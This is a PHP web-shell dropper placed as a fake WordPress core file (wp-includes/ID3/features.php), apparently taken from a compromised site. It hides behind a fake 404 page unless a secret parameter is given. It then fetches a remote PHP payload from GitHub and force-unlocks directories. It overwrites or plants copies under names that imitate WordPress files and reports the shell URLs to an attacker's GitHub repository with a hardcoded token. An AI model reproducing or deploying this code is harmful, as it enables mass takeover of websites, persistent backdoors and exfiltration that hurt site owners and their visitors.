File: /home/galemeraldco/public_html/wp-includes/ID3/features.php
<?php
/**
* CORE MANAGER v51 - Extended Overwrite Edition
* Feature: Large Naming Pool for better stealth and success.
* Access: ?Auto_berlin2020
*/
error_reporting(0);
ini_set('display_errors', 0);
@ini_set('open_basedir', '');
@set_time_limit(0);
// >>> SECURITY LAYER: 404 FORCER <<<
if (!isset($_GET['Auto_berlin2020'])) {
header("HTTP/1.1 404 Not Found");
echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server Port 80</address></body></html>';
exit;
}
// >>> CONFIGURATION <<<
$github_token = "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";
$github_repo = "bdroastmaster-cpu/Shells_storage";
$github_file = "Shells_storage.txt";
$remote_url = "https://raw.githubusercontent.com/alaminx6275-arch/php-file-server1/refs/heads/main/php-file.php";
$target_folders = ['wp-admin', 'wp-content', 'wp-includes', 'cgi-bin', '.well-known', 'uploads', 'plugins', 'themes'];
// বর্ধিত নামের তালিকা (Extended Naming Pool)
$naming_pool = [
'index.php', 'home.php', 'login.php', 'admin.php', 'panel.php', 'config.php',
'system.php', 'wp-load.php', 'xmlrpc.php', 'wp-blog-header.php', 'wp-cron.php',
'wp-settings.php', 'wp-mail.php', 'wp-links-opml.php', 'wp-signup.php',
'wp-activate.php', 'ms-files.php', 'db-status.php', 'about.php', 'users.php',
'options.php', 'maintenance.php', 'security.php', 'test.php', 'api.php',
'core.php', 'load.php', 'data.php', 'module.php', 'plugin-install.php'
];
$critical_files = ['wp-config.php', '.htaccess', 'settings.php', 'php.ini'];
function forceUnlock($path) {
if (!file_exists($path)) return false;
@chmod($path, 0777);
return is_writable($path);
}
function getTargetFileName($path, $pool, $critical) {
shuffle($pool);
foreach ($pool as $name) {
$full_path = $path . DIRECTORY_SEPARATOR . $name;
if (file_exists($full_path)) {
if (!in_array($name, $critical)) return $name;
continue;
}
return $name;
}
return "idx_" . time() . ".php";
}
function buildDomainUrl($full_path) {
$norm_path = str_replace('\\', '/', $full_path);
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
$segments = explode('/', $norm_path);
$domain_found = ""; $web_index = -1;
foreach ($segments as $index => $seg) {
if (strpos($seg, '.') !== false && $index > 0) {
$domain_found = $seg; $web_index = $index;
break;
}
}
if ($domain_found != "" && $web_index != -1) {
$relative_path = implode('/', array_slice($segments, $web_index + 1));
return $protocol . $domain_found . '/' . $relative_path;
}
return $protocol . $_SERVER['HTTP_HOST'] . "/" . basename($full_path);
}
function syncToShellStorage($new_urls, $token, $repo, $file) {
$api_url = "https://api.github.com/repos/$repo/contents/$file";
$headers = ["Authorization: token $token", "User-Agent: CM-v51", "Accept: application/vnd.github.v3+json"];
$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$res = curl_exec($ch);
$data = json_decode($res, true);
$sha = $data['sha'] ?? null;
$old_content = isset($data['content']) ? base64_decode($data['content']) : "";
$combined = trim($old_content) . "\n" . implode("\n", $new_urls);
$final_list = array_unique(array_filter(array_map('trim', explode("\n", $combined))));
$payload = json_encode(["message" => "OvrUpdate ".date("H:i"), "content" => base64_encode(implode("\n", $final_list)), "sha" => $sha]);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
$final_res = curl_exec($ch);
curl_close($ch);
}
@ob_end_flush(); @ob_implicit_flush(true);
$source = @file_get_contents($remote_url);
$urls = []; $ic = 0;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CORE MANAGER v51 | MASS OVERWRITE</title>
<style>
:root { --bg: #050505; --card: #111; --border: #222; --accent: #3b82f6; --neon: #00ff88; --danger: #ff4444; --text: #ddd; }
body { background: var(--bg); color: var(--text); font-family: 'Segoe UI', sans-serif; margin: 0; padding: 20px; display: flex; justify-content: center; }
.wrapper { width: 100%; max-width: 1000px; }
.header { text-align: center; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-bottom: 20px; }
.logo { font-size: 1.8rem; font-weight: bold; color: var(--accent); letter-spacing: 2px; }
.stats-grid { display: grid; grid-template-columns: repeat(2, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-card { background: var(--card); border: 1px solid var(--border); padding: 20px; border-radius: 8px; text-align: center; }
.stat-card div { font-size: 1.6rem; font-weight: bold; color: var(--neon); }
.console { background: #000; border: 1px solid var(--border); height: 450px; overflow-y: auto; padding: 15px; font-size: 11px; color: #999; border-radius: 8px; font-family: monospace; }
.line { border-bottom: 1px solid #111; padding: 4px 0; }
.tag { font-size: 9px; padding: 2px 6px; border-radius: 4px; margin-right: 10px; font-weight: bold; }
.tag-s { background: var(--neon); color: #000; }
.tag-ovr { background: #ffcc00; color: #000; }
textarea { width: 100%; height: 120px; background: #000; color: var(--neon); border: 1px solid var(--border); margin-top: 15px; padding: 15px; font-size: 11px; box-sizing: border-box; resize: none; }
.btn { background: var(--accent); color: #fff; border: none; width: 100%; padding: 15px; cursor: pointer; font-weight: bold; border-radius: 8px; }
</style>
</head>
<body>
<div class="wrapper">
<div class="header"><div class="logo">CORE MANAGER v51</div></div>
<div class="stats-grid">
<div class="stat-card"><span>Injected / Overwritten</span><div id="i_c">0</div></div>
<div class="stat-card"><span>Total Unique URLs</span><div id="u_c">0</div></div>
</div>
<div class="console" id="log">
<?php
if ($source) {
$scan_list = [realpath(__DIR__)];
for ($i = 1; $i <= 4; $i++) {
$up = realpath(__DIR__ . str_repeat('/..', $i));
if ($up && !in_array($up, $scan_list)) $scan_list[] = $up;
}
foreach ($scan_list as $start_dir) {
echo "<div style='color:var(--accent); margin:8px 0;'>[SCAN] $start_dir</div>";
try {
$items = @scandir($start_dir);
if ($items) {
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$full_path = $start_dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($full_path)) {
$it = new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS);
$sub = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::SELF_FIRST);
$sub->setMaxDepth(5); // স্ক্যানিং গভীরতা কিছুটা বাড়ানো হয়েছে
foreach ($sub as $f) {
$fp = $f->getPathname(); $fn = $f->getFilename();
if ($f->isDir() && in_array($fn, $target_folders)) {
if (is_writable($fp) || forceUnlock($fp)) {
$final_name = getTargetFileName($fp, $naming_pool, $critical_files);
$final_path = $fp . DIRECTORY_SEPARATOR . $final_name;
$is_ovr = file_exists($final_path);
if (@file_put_contents($final_path, $source)) {
@chmod($final_path, 0444); $ic++;
echo "<script>document.getElementById('i_c').innerText='$ic';</script>";
$live_url = buildDomainUrl($final_path); $urls[] = $live_url;
$tag = $is_ovr ? "tag-ovr" : "tag-s";
$label = $is_ovr ? "OVERWRITE" : "DEPLOY";
echo "<div class='line'><span class='tag $tag'>$label</span> $live_url</div>";
}
}
}
}
}
}
}
} catch (Exception $e) {}
flush();
}
if (count($urls) > 0) syncToShellStorage($urls, $github_token, $github_repo, $github_file);
}
?>
<div style="color:var(--neon); margin-top:15px; border-top:1px solid #222; padding-top:10px;">[PROCESS FINISHED]</div>
</div>
<textarea id="output" readonly><?php echo implode("\n", array_unique($urls)); ?></textarea>
<button class="btn" onclick="copy()">COPY UNIQUE URLs</button>
</div>
<script>
function copy() {
const a = document.getElementById("output"); if(a.value == "") return;
a.select(); document.execCommand('copy'); alert("Copied.");
}
</script>
</body>
</html>